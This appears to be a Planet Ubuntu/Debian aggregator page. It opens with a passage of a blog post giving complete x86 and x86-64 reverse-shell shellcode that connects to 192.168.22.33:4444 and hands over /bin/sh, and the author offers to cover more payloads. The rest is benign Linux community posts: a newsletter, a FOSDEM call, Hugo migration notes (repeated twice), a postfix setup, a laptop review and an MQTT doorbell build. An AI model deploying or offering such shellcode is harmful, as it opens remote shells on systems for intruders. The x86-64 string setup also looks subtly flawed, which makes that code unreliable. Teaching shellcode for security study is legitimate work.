1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 ; Do the steps to setup a socket (1) ; SYS_socket = 1 mov ebx, 1 ; Setup the arguments to socket() on the stack. push 0 ; Flags = 0 push 1 ; SOCK_STREAM = 1 push 2 ; AF_INET = 2 ; Move a pointer to these values to ecx for socketcall. mov ecx, esp ; We're calling SYS_SOCKETCALL mov eax, 0x66 ; Get the socket int 0x80 ; Time to setup the struct sockaddr_in (2), (3) ; push the address so it ends up in network byte order ; 192.168.22.33 == 0xC0A81621 push 0x2116a8c0 ; push the port as a short in network-byte order ; 4444 = 0x115c mov ebx, 0x5c11 push bx ; push the address family, AF_INET = 2 mov ebx, 0x2 push bx ; Let's establish the connection (4) ; Save address of our struct mov ebx, esp ; Push size of the struct push 0x10 ; Push address of the struct push ebx ; Push the socketfd push eax ; Put the pointer into ecx mov ecx, esp ; We're calling SYS_CONNECT = 3 (via SYS_SOCKETCALL) mov ebx, 0x3 ; Preserve sockfd push eax ; Call SYS_SOCKETCALL mov eax, 0x66 ; Make the connection int 0x80 ; Let's duplicate the FDs from our socket. (5) ; Load the sockfd pop ebx ; STDERR mov ecx, 2 ; Calling SYS_DUP2 = 0x3f mov eax, 0x3f ; Syscall! int 0x80 ; mov to STDOUT dec ecx ; Reload eax mov eax, 0x3f ; Syscall! int 0x80 ; mov to STDIN dec ecx ; Reload eax mov eax, 0x3f ; Syscall! int 0x80 ; Now time to execve (6) ; push "/bin/sh\0" on the stack push 0x68732f push 0x6e69622f ; preserve filename mov ebx, esp ; array of arguments xor eax, eax push eax push ebx ; pointer to array in ecx mov ecx, esp ; null envp xor edx, edx ; call SYS_execve = 0xb mov eax, 0xb ; execute the shell! int 0x80 Reverse Shell in x86-64

This will be very similar to the x86 shellcode, but adjusted for x86-64. I will use the proper x86-64 system calls and 64-bit registers where possible.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 ; Do the steps to setup a socket (1) ; Setup the arguments to socket() in appropriate registers xor rdx, rdx ; Flags = 0 mov rsi, 1 ; SOCK_STREAM = 1 mov rdi, 2 ; AF_INET = 2 ; We're calling SYS_socket mov rax, 41 ; Get the socket syscall ; Time to setup the struct sockaddr_in (2), (3) ; push the address so it ends up in network byte order ; 192.168.22.33 == 0xC0A81621 push 0x2116a8c0 ; push the port as a short in network-byte order ; 4444 = 0x115c mov bx, 0x5c11 push bx ; push the address family, AF_INET = 2 mov bx, 0x2 push bx ; Let's establish the connection (4) ; Save address of our struct mov rsi, rsp ; size of the struct mov rdx, 0x10 ; Our socket fd mov rdi, rax ; Preserve sockfd push rax ; Call SYS_connect mov rax, 42 ; Make the connection syscall ; Let's duplicate the FDs from our socket. (5) ; Load the sockfd pop rdi ; STDERR mov rsi, 2 ; Calling SYS_dup2 = 0x21 mov rax, 0x21 ; Syscall! syscall ; mov to STDOUT dec rsi ; Reload rdi mov rax, 0x21 ; Syscall! syscall ; mov to STDIN dec rsi ; Reload rdi mov rax, 0x21 ; Syscall! syscall ; Now time to execve (6) ; push "/bin/sh\0" on the stack push 0x68732f push 0x6e69622f ; preserve filename mov rdi, rsp ; array of arguments xor rdx, rdx push rdx push rdi ; pointer to array in rsi mov rsi, rsp ; call SYS_execve = 59 mov rax, 59 ; execute the shell! syscall Conclusion

The structural simularities between either assembly implementation and the C source code should be fairly evident. When I write shellcode, I usually write out the list of steps involved, then write a version in C, and finally translate to the assembly for the shellcode. I’m a bit of a control freak, so whenever I need custom shellcode, I got straight to the assembly.

Let me know if there’s a particular shellcode payload you’re interested in me covering or if you have feedback on the style or usefulness of these posts.

The Fridge: Ubuntu Weekly Newsletter Issue 551

Planet Ubuntu - Hën, 29/10/2018 - 9:34md

Welcome to the Ubuntu Weekly Newsletter, Issue 551 for the week of October 21 – 27, 2018. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

Daniel Pocock: FOSDEM 2019 Real-Time Communications Call for Participation

Planet Ubuntu - Hën, 29/10/2018 - 8:57md

FOSDEM is one of the world's premier meetings of free software developers, with over five thousand people attending each year. FOSDEM 2019 takes place 2-3 February 2019 in Brussels, Belgium.

This email contains information about:

  • Real-Time communications dev-room and lounge,
  • speaking opportunities,
  • volunteering in the dev-room and lounge,
  • social events (the legendary FOSDEM Beer Night and Saturday night dinners provide endless networking opportunities),
  • the Planet aggregation sites for RTC blogs
Call for participation - Real Time Communications (RTC)

The Real-Time Communications dev-room and Real-Time lounge is about all things involving real-time communication, including: XMPP, SIP, WebRTC, telephony, mobile VoIP, codecs, peer-to-peer, privacy and encryption. The dev-room is a successor to the previous XMPP and telephony dev-rooms. We are looking for speakers for the dev-room and volunteers and participants for the tables in the Real-Time lounge.

The dev-room is only on Sunday, 3rd of February 2019. The lounge will be present for both days.

To discuss the dev-room and lounge, please join the Free RTC mailing list.

To be kept aware of major developments in Free RTC, without being on the discussion list, please join the Free-RTC Announce list.

Speaking opportunities

Note: if you used FOSDEM Pentabarf before, please use the same account/username

Real-Time Communications dev-room: deadline 23:59 UTC on 2nd of December. Please use the Pentabarf system to submit a talk proposal for the dev-room. On the "General" tab, please look for the "Track" option and choose "Real Time Communications devroom". Link to talk submission.

Other dev-rooms and lightning talks: some speakers may find their topic is in the scope of more than one dev-room. It is encouraged to apply to more than one dev-room and also consider proposing a lightning talk, but please be kind enough to tell us if you do this by filling out the notes in the form.

You can find the full list of dev-rooms on this page and apply for a lightning talk at https://fosdem.org/submit

Main track: the deadline for main track presentations is 23:59 UTC 3 November. Leading developers in the Real-Time Communications field are encouraged to consider submitting a presentation to the main track.

First-time speaking?

FOSDEM dev-rooms are a welcoming environment for people who have never given a talk before. Please feel free to contact the dev-room administrators personally if you would like to ask any questions about it.

Submission guidelines

The Pentabarf system will ask for many of the essential details. Please remember to re-use your account from previous years if you have one.

In the "Submission notes", please tell us about:

  • the purpose of your talk
  • any other talk applications (dev-rooms, lightning talks, main track)
  • availability constraints and special needs

You can use HTML and links in your bio, abstract and description.

If you maintain a blog, please consider providing us with the URL of a feed with posts tagged for your RTC-related work.

We will be looking for relevance to the conference and dev-room themes, presentations aimed at developers of free and open source software about RTC-related topics.

Please feel free to suggest a duration between 20 minutes and 55 minutes but note that the final decision on talk durations will be made by the dev-room administrators based on the received proposals. As the two previous dev-rooms have been combined into one, we may decide to give shorter slots than in previous years so that more speakers can participate.

Please note FOSDEM aims to record and live-stream all talks. The CC-BY license is used.

Volunteers needed

To make the dev-room and lounge run successfully, we are looking for volunteers:

  • FOSDEM provides video recording equipment and live streaming, volunteers are needed to assist in this
  • organizing one or more restaurant bookings (dependending upon number of participants) for the evening of Saturday, 2 February
  • participation in the Real-Time lounge
  • helping attract sponsorship funds for the dev-room to pay for the Saturday night dinner and any other expenses
  • circulating this Call for Participation (this text) to other mailing lists
Social events and dinners

The traditional FOSDEM beer night occurs on Friday, 1st of February.

On Saturday night, there are usually dinners associated with each of the dev-rooms. Most restaurants in Brussels are not so large so these dinners have space constraints and reservations are essential. Please subscribe to the Free-RTC mailing list for further details about the Saturday night dinner options and how you can register for a seat.

Spread the word and discuss

If you know of any mailing lists where this CfP would be relevant, please forward this email. If this dev-room excites you, please blog or microblog about it, especially if you are submitting a talk.

If you regularly blog about RTC topics, please send details about your blog to the planet site administrators:

Planet site Admin contact All projects Free-RTC Planet (http://planet.freertc.org) contact planet@freertc.org XMPP Planet Jabber (http://planet.jabber.org) contact ralphm@ik.nu SIP Planet SIP (http://planet.sip5060.net) contact planet@sip5060.net SIP (Español) Planet SIP-es (http://planet.sip5060.net/es/) contact planet@sip5060.net

Please also link to the Planet sites from your own blog or web site as this helps everybody in the free real-time communications community.

Contact

For any private queries, contact us directly using the address fosdem-rtc-admin@freertc.org and for any other queries please ask on the Free-RTC mailing list.

The dev-room administration team:

I was a podcast guest on The REPL

Planet Debian - Pre, 26/10/2018 - 10:00md

Daniel Compton hosted me on his Clojure podcast, The REPL, where I talked about Debian, packaging Leiningen, and the Clojure ecosystem in Debian. It's got everything: spooky abandoned packages, anarchist collectives, software security policies, and Debian release cycles. Absolutely no shade was thrown at other distros.

Give it a listen:

Your browser does not support the audio element.

Download: MP3

More Q&A

After the podcast was published, Ivan Sagalaev wrote me with a great question about how the different versions of Clojure in Ubuntu 18.04 work:

First of all, THANK YOU for making sudo apt install leiningen work! It's so much better and more consistent than sourcing bash scripts :-)

I have a quick question for you. After installing leiningen and clojure on Ubuntu 18.04 I see that lein repl starts with clojure 1.8.0, while the clojure package itself seems to be independent and is version 1.9.0. How is it possible? I frankly haven't even seen lein downloading its own clojure.jar...

I replied:

Leiningen is "ahead-of-time (AOT) compiled", which is a fancy way of saying that the Leiningen you download from Ubuntu is pre-built. This means it is already compiled to Java bytecode, which can be run directly by Java. I ship the binary Leiningen package as an "uberjar", which means all its dependencies are also included inside the Leiningen jar.

Leiningen depends on and is built with Clojure 1.8, so the Leiningen uberjar in Debian also depends on Clojure 1.8. The "clojure" package in 18.04 defaults to installing Clojure 1.9, but that can be installed simultaneously with the "clojure1.8" package that Leiningen depends on in order to build. You can change your default Clojure to 1.8 using alternatives.

When you launch lein repl, by default the Clojure 1.8 runtime that's compiled in is used. If you run lein repl in the root of a Clojure 1.9 project, Leiningen will download Clojure 1.9 from Clojars and launch a 1.9 repl. If you want to use the Clojure 1.9 shipped with Debian, you can change :local-repo to point at /usr/share/maven-repo, but be careful to also set :offline? to true so you don't try to install things into the system maven repo by accident.

Elana Hashman https://hashman.ca/ hashman.ca

smartmontools

Planet Debian - Pre, 26/10/2018 - 11:46pd

I don't do much Debian stuff these days (too busy) but I have adopted some packages over the last year. This has happened if a package that I rely on is lacking person-power and was at risk of being removed from Debian. I thought I should write about some of them. First up, smartmontools.

smartmontools let you query the "Self-Monitoring, Analysis and Reporting Technology" (S.M.A.R.T.) information in your computer's storage devices (hard discs and solid-state equivalents), as well as issue S.M.A.R.T. commands to them, such as instructing them to execute self-tests.

I rescued smartmontools for the Debian release in 2015, but I thought that was a one-off. Since I've just done it again I'm now considering it something I (co-)maintain1.

S.M.A.R.T. can, in theory, give you advance warning about a disc that is "not well" and could stop working. In practice, it isn't very good at predicting disc failures2 — which might explain why the package hasn't received more attention — but it can still be useful: last year it helped me to detect an issue with excessive drive-head parking I was experiencing on one of my drives.

  1. Personally I think the notion of single-maintainers for packages is old and destructive, and I think it should be the exception rather than the norm. Unfortunately it's still baked into a lot of our processes, policies and tools. ↩

jmtd https://jmtd.net/log/ Jonathan Dowland's Weblog

Santiago Zarate: Setting up postfix, dovecot and sieve

Planet Ubuntu - Pre, 26/10/2018 - 2:00pd
The horror

While trying to set up my mail system, I ran into multiple tutorials to figure out what was the best way to avoid multiple error messages, mainly because you, like me (you silly human!), simply copy and pasted random stuff from stack overflow, and tutorials in howtoforge and places like that…

The mistakes

You tried something like this

spamassassin unix - n n - - pipe flags=DROhu user=vmail argv=/usr/bin/spamc -e /usr/lib/dovecot/deliver -f ${sender} -d ${user}@${nexthop}

or this:

mailbox_transport = lmtp:unix:private/lmtp virtual_transport = lmtp:unix:private/lmtp The pain

so you ended up with something that looks similar to this:

Oct 24 01:13:24 nergal postfix/pipe[10207]: fatal: get_service_attr: unknown username: vmail Oct 24 01:13:25 nergal postfix/master[10104]: warning: process /usr/lib/postfix/bin//pipe pid 10207 exit status 1 Oct 24 01:13:25 nergal postfix/qmgr[10106]: warning: private/spamassassin socket: malformed response Oct 24 01:13:25 nergal postfix/master[10104]: warning: /usr/lib/postfix/bin//pipe: bad command startup -- throttling Oct 24 01:13:25 nergal postfix/qmgr[10106]: warning: transport spamassassin failure -- see a previous warning/fatal/panic logfile record for the problem description Resignation

So what worked for me was to leave the service in the master.cf as I had it working…

and simply add to master.cf

spamassassin unix - n n - - pipe flags=R user=app argv=/usr/bin/spamc -e /usr/sbin/sendmail -oi -f ${sender} ${recipient}

and in the main.cf

mailbox_command = /usr/lib/dovecot/deliver The light

Sieve filtering started to work after these changes :)

Serge Hallyn: Outdoors laptop (part 2)

Planet Ubuntu - Pre, 26/10/2018 - 12:59pd

Some time ago I posted about wanting an outdoor laptop. The first option I listed was a panasonic toughbook. Recently (a year and a half later) I finally ordered one. I ordered from bobjohnson.com, because the people there are a class act who’ve been calmly answering my questions for a long time.

Some highlights:

* It has a transflective display. This means that it is emissive, but also uses reflected sunlight to boost brightness, up to 6000 nits. In comparison, my previous thinkpad was 350 nit (unusable sometimes even in shade), and my macbook was 500nit. With this laptop, I can leave the display on 25% brightness and move from a dark basement to hurt-my-skin bright sunlight.

* It’s ‘fully rugged’, so using it in rain or dust storms should not be an issue. (I lost 4G ram in my thinkpad to dust).

* It has a shoulder strap ($20 extra) screwed on solidly.

* It has a touchscreen with stylus. (To use this under ubuntu 18.04 I had to install xserver-xorg-input-evdev and remove xserver-xorg-input-libinput. Note just installing evdev was not enough) I may look like a dweeb, but I prefer this to smudging my screen.

The laptop I got is a CF-19 MK6. This is several years old and refurbished. The reason I went with this instead of a new toughbook (besides price) is because, as far as I can tell, only the CF-19 MK5 through MK8 have the transflective display. The replacement for the CF-19 (the CF-20) may have a better screen (i’ve not seen it), but it is not transflective and comes in at “only” 1000nit. Same with the slightly larger nonconvertable laptops.

Mind you, there is (I trust) a reason these screens did not take off – the colors are kind of washed out, and it’s low resolution. But for reading kernel code by the pool without draining the battery in 1 hr, the only thing I can imagine being better is an eink screen.

The CF-19 is compact: it’s a 10″ (convertible) netbook. This keyboard is more cramped than on my old s100 netbook. I do actually kind of like the keys – they have a good travel depth and a nice click. But it’s weird going back to a full-size keyboard.

The first time I measured the battery life, it shut down when battery listed 36% remaining, after a mere got 3 hours. Panasonic had advertised 10 hours for this laptop. 3 was unacceptable, and I was about ready to send it back. But, reading the powertop output, I noticed that the sound card was listed as taking tons of battery power. So for my next run I did a powertop –auto-tune, and got over 4 hours battery life. Then I noticed bluetooth radio doing the same, so I did rmmod btusb. These are now all done on startup by systemd. The battery still stops at 35%, which takes getting used to, but it’s acceptable.

4.5 hours is still limiting, so I picked up a second battery and an external charger. I can charge one battery while using the other, or take both batteries along for a longer trip.

In summary – i may have found my outdoors laptop. I’d still prefer it be thinner, with a slightly larger and mechanical keyboard, and have 12 hour battery life, delivered on a unicorn…

(Here is an attempt to show the screen in very bright sunlight. It’s hard to get a good photo, since the camera wants to play its own games) :

Julian Andres Klode: Migrated website from ikiwiki to Hugo

Planet Ubuntu - Enj, 25/10/2018 - 8:42md

So, I’ve been using ikiwiki for my website since 2011. At the time, I was hosting the website on a tiny hosting package included in a DSL contract - nothing dynamic possible, so a static site generator seemed like a good idea. ikiwiki was a good social fit at the time, as it was packaged in Debian and developed by a Debian Developer.

Today, I finished converting it to Hugo.

Why?

I did not really have a huge problem with ikiwiki, but I recently converted my blog from wordpress to hugo and it seemed to make sense to have one technology for both, especially since I don’t update the website very often and forget ikiwiki’s special things.

One thing that was somewhat annoying is that I built a custom ikiwiki plugin for the menu in my template, so I had to clone it’s repository into ~/.ikiwiki every time, rather than having a self-contained website. Well, it was a submodule of my dotfiles repo.

Another thing was that ikiwiki had a lot of git integration, and when you build your site it tries to push things to git repositories and all sorts of weird stuff – Hugo just does one thing: It builds your page.

One thing that Hugo does a lot better than ikiwiki is the built-in server which allows you to run `hugo server´ and get a local http URL you can open in the browser with live-reload as you save files. Super convenient to check changes (and of course, for writing this blog post)!

Also, in general, Hugo feels a lot more modern. ikiwiki is from 2006, Hugo is from 2013. Especially recent Hugo versions added quite a few features for asset management.

  • Fingerprinting of assets like css (inserting hash into filename) - ikiwiki just contains its style in style.css (and your templates in other statically named files), so if you switch theming details, you could break things because the CSS the browser has cached does not match the CSS the page expects.
  • Asset minification - Hugo can minimize CSS and JavaScript for you. This means browers have to fetch less data.
  • Asset concatenation - Hugo can concatenate CSS and JavaScript. This allows you to serve only one file per type, reducing the number of round trips a client has to make.

There’s also proper theming support, so you can easily clone a theme into the themes/ directory, or add it as a submodule like I do for my blog. But I don’t use it for the website yet.

Oh, and Hugo automatically generates sitemap.xml files for your website, teaching search engines which pages exist and when they have been modified.

I also like that it’s written in Go vs in Perl, but I think that’s just another more modern type of thing. Gotta keep up with the world!

Basic conversion

The first part to the conversion was to split the repository of the website: ikiwiki puts templates into a templates/ subdirectory of the repository and mixes all other content. Hugo on the other hand splits things into content/ (where pages go), layouts (page templates), and static/ (other files).

The second part was to inject the frontmatter into the markdown files. See, ikiwiki uses shortcuts like this to set up the title, and gets its dates from git:

[[!meta title="My page title"]]

on the other hand, Hugo uses frontmatter - some YAML at the beginning of the markdown, and specifies the creation date in there:

--- title: "My page title" date: Thu, 18 Oct 2018 21:36:18 +0200 ---

You can also have lastmod in there when modifying it, but I set enableGitInfo = true in config.toml so Hugo picks up the mtime from the git repo.

I wrote a small script to automatize those steps, but it was obviously not perfect (also, it inserted lastmod, which it should not have).

One thing it took me some time to figure out was that index.mdown needs to become _index.md in the content/ directory of Hugo, otherwise no pages below it are rendered - not entirely obvious.

The theme

Converting the template was surprisingly easy, it was just a matter of replacing <TMPL_VAR BASEURL> and friends with { .Site.BaseURL } and friends - the names are basically the same, just sometimes there’s .Site at the front of it.

Then I had to take care of the menu generation loop. I had my bootmenu plugin for ikiwiki which allowed me to generate menus from the configuration file. The template for it looked like this:

<TMPL_LOOP BOOTMENU> <TMPL_IF FIRSTNAV> <li <TMPL_IF ACTIVE>class="active"</TMPL_IF>><a href="<TMPL_VAR URL>"><TMPL_VAR PAGE></a></li> </TMPL_IF> </TMPL_LOOP>

I converted this to:

{{ $currentPage := . }} {{ range .Site.Menus.main }} <li class="{{ if $currentPage.IsMenuCurrent "main" . }}active{{ end }}"> <a href="{{ .URL }}"> {{ .Pre | safeHTML }} <span>{{ .Name }}</span> </a> {{ .Post }} </li> {{ end }}

this allowed me to configure my menu in config.toml like this:

[menu] [[menu.main]] name = "dh-autoreconf" url = "/projects/dh-autoreconf" weight = -110

I can also specify pre and post parts and a right menu, and I use pre and post in the right menu to render a few icons before and after items, for example:

[[menu.right]] pre = "<i class='fab fa-mastodon'></i>" post = "<i class='fas fa-external-link-alt'></i>" url = "https://mastodon.social/@juliank" name = "Mastodon" weight = -70

Setting class="active" on the menu item does not seem to work yet, though; I think I need to find out the right code for that…

Fixing up the details

Once I was done with that steps, the next stage was to convert ikiwiki shortcodes to something hugo understands. This took 4 parts:

The first part was converting tables. In ikiwiki, tables look like this:

[[!table format=dsv data=""" Status|License|Language|Reference Active|GPL-3+|Java|[github](https://github.com/julian-klode/dns66) """]]

The generated HTML table had the class="table" set, which the bootstrap framework needs to render a nice table. Converting that to a straightforward markdown hugo table did not work: Hugo did not add the class, so I had to convert pages with tables in them to the mmark variant of markdown, which allows classes to be set like this {.table}, so the end result then looked like this:

{.table} Status|License|Language|Reference ------|-------|--------|--------- Active|GPL-3+|Java|[github](https://github.com/julian-klode/dns66)

I’ll be able to get rid of this in the future by using the bootstrap sources and then having table inherit .table properties, but this requires saas or less, and I only have the CSS at the moment, so using mmark was slightly easier.

The second part was converting ikiwiki links like [[MyPage]] and [[my title|MyPage]] to Markdown links. This was quite easy, the first one became [MyPage](MyPage) and the second one [my title](my page).

The third part was converting custom shortcuts: I had [[!lp <number>]] to generate a link LP: #<number> to the corresponding launchpad bug, and [[!Closes <number>]] to generate Closes: #<number> links to the Debian bug tracker. I converted those to normal markdown links, but I could have converted them to Hugo shortcodes. But meh.

The fourth part was about converting some directory indexes I had. For example, [[!map pages="projects/dir2ogg/0.12/* and ! projects/dir2ogg/0.12/*/*"]] generated a list of all files in projects/dir2ogg/0.12. There was a very useful shortcode for that posted on the Hugo documentation, I used a variant of it and then converted pages like this to {{< directoryindex path="/static/projects/dir2ogg/0.12" pathURL="/projects/dir2ogg/0.12" >}}. As a bonus, the new directory index also generates SHA256 hashes for all files!

Further work

The website is using an old version of bootstrap, and the theme is not split out yet. I’m not sure if I want to keep a bootstrap theme for the website, seeing as the blog theme is Bulma-based - it would be easier to have both use bulma.

I also might want to update both the website and the blog by pushing to GitHub and then using CI to build and push it. That would allow me to write blog posts when I don’t have my laptop with me. But I’m not sure, I might lose control if there’s a breach at travis.

Migrated website from ikiwiki to Hugo

Planet Debian - Enj, 25/10/2018 - 8:42md

So, I’ve been using ikiwiki for my website since 2011. At the time, I was hosting the website on a tiny hosting package included in a DSL contract - nothing dynamic possible, so a static site generator seemed like a good idea. ikiwiki was a good social fit at the time, as it was packaged in Debian and developed by a Debian Developer.

Today, I finished converting it to Hugo.

Why?

I did not really have a huge problem with ikiwiki, but I recently converted my blog from wordpress to hugo and it seemed to make sense to have one technology for both, especially since I don’t update the website very often and forget ikiwiki’s special things.

One thing that was somewhat annoying is that I built a custom ikiwiki plugin for the menu in my template, so I had to clone it’s repository into ~/.ikiwiki every time, rather than having a self-contained website. Well, it was a submodule of my dotfiles repo.

Another thing was that ikiwiki had a lot of git integration, and when you build your site it tries to push things to git repositories and all sorts of weird stuff – Hugo just does one thing: It builds your page.

One thing that Hugo does a lot better than ikiwiki is the built-in server which allows you to run `hugo server´ and get a local http URL you can open in the browser with live-reload as you save files. Super convenient to check changes (and of course, for writing this blog post)!

Also, in general, Hugo feels a lot more modern. ikiwiki is from 2006, Hugo is from 2013. Especially recent Hugo versions added quite a few features for asset management.

  • Fingerprinting of assets like css (inserting hash into filename) - ikiwiki just contains its style in style.css (and your templates in other statically named files), so if you switch theming details, you could break things because the CSS the browser has cached does not match the CSS the page expects.
  • Asset minification - Hugo can minimize CSS and JavaScript for you. This means browers have to fetch less data.
  • Asset concatenation - Hugo can concatenate CSS and JavaScript. This allows you to serve only one file per type, reducing the number of round trips a client has to make.

There’s also proper theming support, so you can easily clone a theme into the themes/ directory, or add it as a submodule like I do for my blog. But I don’t use it for the website yet.

Oh, and Hugo automatically generates sitemap.xml files for your website, teaching search engines which pages exist and when they have been modified.

I also like that it’s written in Go vs in Perl, but I think that’s just another more modern type of thing. Gotta keep up with the world!

Basic conversion

The first part to the conversion was to split the repository of the website: ikiwiki puts templates into a templates/ subdirectory of the repository and mixes all other content. Hugo on the other hand splits things into content/ (where pages go), layouts (page templates), and static/ (other files).

The second part was to inject the frontmatter into the markdown files. See, ikiwiki uses shortcuts like this to set up the title, and gets its dates from git:

[[!meta title="My page title"]]

on the other hand, Hugo uses frontmatter - some YAML at the beginning of the markdown, and specifies the creation date in there:

--- title: "My page title" date: Thu, 18 Oct 2018 21:36:18 +0200 ---

You can also have lastmod in there when modifying it, but I set enableGitInfo = true in config.toml so Hugo picks up the mtime from the git repo.

I wrote a small script to automatize those steps, but it was obviously not perfect (also, it inserted lastmod, which it should not have).

One thing it took me some time to figure out was that index.mdown needs to become _index.md in the content/ directory of Hugo, otherwise no pages below it are rendered - not entirely obvious.

The theme

Converting the template was surprisingly easy, it was just a matter of replacing <TMPL_VAR BASEURL> and friends with { .Site.BaseURL } and friends - the names are basically the same, just sometimes there’s .Site at the front of it.

Then I had to take care of the menu generation loop. I had my bootmenu plugin for ikiwiki which allowed me to generate menus from the configuration file. The template for it looked like this:

<TMPL_LOOP BOOTMENU> <TMPL_IF FIRSTNAV> <li <TMPL_IF ACTIVE>class="active"</TMPL_IF>><a href="<TMPL_VAR URL>"><TMPL_VAR PAGE></a></li> </TMPL_IF> </TMPL_LOOP>

I converted this to:

{{ $currentPage := . }} {{ range .Site.Menus.main }} <li class="{{ if $currentPage.IsMenuCurrent "main" . }}active{{ end }}"> <a href="{{ .URL }}"> {{ .Pre | safeHTML }} <span>{{ .Name }}</span> </a> {{ .Post }} </li> {{ end }}

this allowed me to configure my menu in config.toml like this:

[menu] [[menu.main]] name = "dh-autoreconf" url = "/projects/dh-autoreconf" weight = -110

I can also specify pre and post parts and a right menu, and I use pre and post in the right menu to render a few icons before and after items, for example:

[[menu.right]] pre = "<i class='fab fa-mastodon'></i>" post = "<i class='fas fa-external-link-alt'></i>" url = "https://mastodon.social/@juliank" name = "Mastodon" weight = -70

Setting class="active" on the menu item does not seem to work yet, though; I think I need to find out the right code for that…

Fixing up the details

Once I was done with that steps, the next stage was to convert ikiwiki shortcodes to something hugo understands. This took 4 parts:

The first part was converting tables. In ikiwiki, tables look like this:

[[!table format=dsv data=""" Status|License|Language|Reference Active|GPL-3+|Java|[github](https://github.com/julian-klode/dns66) """]]

The generated HTML table had the class="table" set, which the bootstrap framework needs to render a nice table. Converting that to a straightforward markdown hugo table did not work: Hugo did not add the class, so I had to convert pages with tables in them to the mmark variant of markdown, which allows classes to be set like this {.table}, so the end result then looked like this:

{.table} Status|License|Language|Reference ------|-------|--------|--------- Active|GPL-3+|Java|[github](https://github.com/julian-klode/dns66)

I’ll be able to get rid of this in the future by using the bootstrap sources and then having table inherit .table properties, but this requires saas or less, and I only have the CSS at the moment, so using mmark was slightly easier.

The second part was converting ikiwiki links like [[MyPage]] and [[my title|MyPage]] to Markdown links. This was quite easy, the first one became [MyPage](MyPage) and the second one [my title](my page).

The third part was converting custom shortcuts: I had [[!lp <number>]] to generate a link LP: #<number> to the corresponding launchpad bug, and [[!Closes <number>]] to generate Closes: #<number> links to the Debian bug tracker. I converted those to normal markdown links, but I could have converted them to Hugo shortcodes. But meh.

The fourth part was about converting some directory indexes I had. For example, [[!map pages="projects/dir2ogg/0.12/* and ! projects/dir2ogg/0.12/*/*"]] generated a list of all files in projects/dir2ogg/0.12. There was a very useful shortcode for that posted on the Hugo documentation, I used a variant of it and then converted pages like this to {{< directoryindex path="/static/projects/dir2ogg/0.12" pathURL="/projects/dir2ogg/0.12" >}}. As a bonus, the new directory index also generates SHA256 hashes for all files!

Further work

The website is using an old version of bootstrap, and the theme is not split out yet. I’m not sure if I want to keep a bootstrap theme for the website, seeing as the blog theme is Bulma-based - it would be easier to have both use bulma.

I also might want to update both the website and the blog by pushing to GitHub and then using CI to build and push it. That would allow me to write blog posts when I don’t have my laptop with me. But I’m not sure, I might lose control if there’s a breach at travis.

Julian Andres Klode https://blog.jak-linux.org/post/ Posts on Blog of Julian Andres Klode

MQTT enabling my doorbell

Planet Debian - Enj, 25/10/2018 - 8:05md

One of the things about my home automation journey is that I don’t always start out with a firm justification for tying something into my setup. There’s not really any additional gain at present from my living room lights being remotely controllable. When it came to tying the doorbell into my setup I had a clear purpose in mind: I often can’t hear it from my study.

The existing device was a Byron BY101. This consists of a 433MHz bell-push and a corresponding receiver that plugs into a normal mains socket for power. I tried moving the receiver to a more central location, but then had issues with it not reliably activating when the button was pushed. I could have attempted the inverse of Colin’s approach and tried to tie in a wired setup to the wireless receiver, but that would have been too simple.

I first attempted to watch for the doorbell via a basic 433MHz receiver. It seems to use a simple 16 bit identifier followed by 3 bits indicating which tone to use (only 4 are supported by mine; I don’t know if other models support more). The on/off timings are roughly 1040ms/540ms vs 450ms/950ms. I found I could reliably trigger the doorbell using these details, but I’ve not had a lot of luck with reliable 433MHz reception on microcontrollers; generally I use PulseView in conjunction with a basic Cypress FX2 logic analyser to capture from a 433MHz receiver and work out timings. Plus I needed a receiver that could be placed close enough to the bell-push to reliably pick it up.

Of course I already had a receiver that could decode the appropriate codes - the doorbell! Taking it apart revealed a PSU board and separate receiver/bell board. The receiver uses a PT4318-S with a potted chip I assume is the microcontroller. There was an HT24LC02 I2C EEPROM on the bottom of the receiver board; monitoring it with my BusPirate indicated that the 16 bit ID code was stored in address 0x20. Sadly it looked like the EEPROM was only used for data storage; only a handful of values were read on power on.

Additionally there were various test points on the board; probing while pressing the bell-push led to the discovery of a test pad that went to 1.8v when a signal was detected. Perfect. I employed an ESP82661 in the form of an ESP-07, sending out an MQTT message containing “ON” or “OFF” as appropriate when the state changed. I had a DS18B20 lying around so I added that for some temperature monitoring too; it reads a little higher due to being inside the case, but not significantly so.

All of this ended up placed in the bedroom, which conveniently had a socket almost directly above the bell-push. Tying it into Home Assistant was easy:

binary_sensor: - platform: mqtt name: Doorbell state_topic: "doorbell/master-bedroom/button"

I then needed something to alert me when the doorbell was pushed. Long term perhaps I’ll add some sounders around the house hooked in via MQTT, and there’s a Kodi notifier available, but that’s only helpful when the TV is on. I ended up employing my Alexa via Notify Me:

notify: - name: alexa platform: rest message_param_name: notification resource: https://api.notifymyecho.com/v1/NotifyMe data: accessCode: !secret notifyme_key

and then an automation in automations.yaml:

- id: alexa_doorbell alias: Notify Alexa when the doorbell is pushed trigger: - platform: state entity_id: binary_sensor.doorbell to: 'on' action: - service: notify.alexa data_template: message: "Doorbell rang at {{ states('sensor.time') }}"

How well does this work? Better than expected! A couple of days after installing everything we were having lunch when Alexa chimed; the door had been closed and music playing, so we hadn’t heard the doorbell. Turned out to be an unexpected delivery which we’d otherwise have missed. It also allows us to see when someone has rang the doorbell when we were in - useful for seeing missed deliveries etc.

